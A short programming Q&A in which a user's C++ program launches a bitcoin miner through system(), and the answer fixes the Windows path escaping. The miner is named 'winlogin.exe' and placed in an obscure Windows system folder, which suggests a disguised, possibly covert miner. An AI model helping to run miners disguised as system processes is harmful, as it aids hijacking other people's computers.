# Problems using system() commands under Windows

Tags: c++, windows, command-prompt, bitcoin

i'm trying to run a bitcoin miner trough a system command.
Here is the code

```
#include <windows.h>
int main()
{
system("C:\Windows\AppPatch\Custom\Personal\winlogin.exe -o http://example.pool.com:80 -u user -p password");
}
```

But the prompt windows apper for a millisecond and close instantly. Any suggest?
thanks.

Comment: What's the result when you run this command in a terminal?

Answer (score 1):

You need to have double \ for paths

```
system("C:\\Windows\\AppPatch\\Custom\\Personal\\winlogin.exe -o http://example.pool.com:80 -u user -p password");
```

or single '/'

Comment: I hate windows backslash. Again. Thanks :)

Comment: Or you could use the other slash '/'